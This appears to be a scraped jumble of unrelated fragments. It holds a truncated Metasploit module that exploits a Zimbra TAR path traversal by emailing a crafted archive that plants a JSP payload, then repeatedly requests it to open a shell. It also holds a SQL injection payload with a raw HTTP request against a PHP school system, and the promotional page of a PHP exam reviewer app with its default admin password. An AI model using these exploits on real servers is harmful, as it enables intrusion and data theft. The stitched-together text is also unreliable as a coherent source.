OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])      ]    )  end  def exploit    print_status('Encoding the payload as .jsp')    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)    # Small sanity-check    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')    end    # Generate a filename if needed    target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp"    symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10)    # Sanity check - the file shouldn't exist, but we should be able to do requests to the server    if datastore['TRIGGER_PAYLOAD']      print_status('Checking the HTTP connection to the target')      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')      end      # Break when the file successfully appears      unless res.code == 404        fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}")      end    end    # Create the file    begin      contents = StringIO.new      Rex::Tar::Writer.new(contents) do |t|        print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}")        t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755)        print_status("Adding target file to the archive: #{target_filename}")        t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f|          f.write(payload)        end      end      contents.seek(0)      tar = contents.read      contents.close    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}")    end    file_create(tar)    print_good('File created! Email the file above to any user on the target Zimbra server')    # Bail if they don't want the payload triggered    return unless datastore['TRIGGER_PAYLOAD']    register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename))    interval = datastore['CheckInterval'].to_i    print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...")    # This loop is mostly from `multi/handler`    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i    timeout = datastore['ListenerTimeout'].to_i    loop do      break if session_created?      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')      end      # Break when the file successfully appears      if res.code == 200        print_good('Successfully triggered the payload')        # This should break when we get to session_created?      end      Rex::ThreadSafe.sleep(interval)    end  endend

Zimbra Collaboration Suite TAR Path Traversal

Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=.

\[+\] Payload: nid=2' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)-- - // Leak place ---> nid

    GET /upresult/upresult/notice-details.php?nid=2%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=3thbvl3jh0h823b43vpautdf10
    Connection: close

CVE-2022-42021: bug_report/SQLi-1.md at main · 623085881/bug_report

Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload.

Submitted by oretnom23 on Saturday, February 5, 2022 - 17:22.

****Introduction****

This is a **Simple PHP** entitled **Exam Reviewer Management System**. This is a web-based application is an online platform for reviewing an Exam. It can be useful for schools, companies, organizations, etc. The system provides an answer sheet to the reviewers which have random questions that are possible to occur in the actual exam. The application has a small scope, simple, and is easy to use. It has a pleasant user interface and a mobile responsive at the public side of the system. The project has user-friendly features and functionalities.

****About the Exam Reviewer Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

The **Exam Reviewer Management System Project** has 2 sides of the user interface. One is the **Management Side** where the management can manage the Review Questionnaires, and one for the public side. The Public Side of the system is a simple website where the reviewers can read some content about the system, explore the exam reviewer list, and take the Exam to practice. The **Management Side** requires the users to log their system user credentials in order to access the features and functionalities of the said side. The management staffs are the ones who are in charge of managing the practice Test/Exam. This side can be only accessed by 2 types of users which are the **Administrator** and the **Staff**. The **Administrator** has the privilege to access and manage all the features and functionalities on the management side while the **Staff** have only limited access.

****Features********Management Side****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Exam Categories Management**
    *   Add New Lead Category
    *   List All Lead Categories
    *   View Lead Category
    *   Update Lead Category
    *   Delete Lead Category
*   **Exam Management**
    *   Add New Exam
    *   List All Exams
    *   View Exam
    *   Add Question
    *   List Questions
    *   Update Question
    *   Dynamically add/Remove Choices/Options in every Question
    *   Delete Question
    *   Update Exam
    *   Delete Exam
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****Public-Side****

*   **Welcome Content**
*   **Exam Lists**
*   **Search Exam**
*   **View Exam Details**
*   **Take the Practice Exam**
*   **View the Practice Exam Result**
*   **'About' Content**

**System Snapshots of some Features****Practice Exam Details (Management Side)**

**Exam List (Public-Side)**

**Exam Details Modal (Public-Side)**

**Questionnaire (Public-Side)**

**Questionnaire - Mobile (Public-Side)**

**Result (Public-Side)**

**Result - Mobile (Public-Side)**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  **Enable** or **Uncomment** the **GD Library** on your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****erms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****erms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Exam Reviewer Management System** in a **browser**. i.e. ****http://localhost/erms/****.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Exam Reviewer Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2679 views

Tag

#php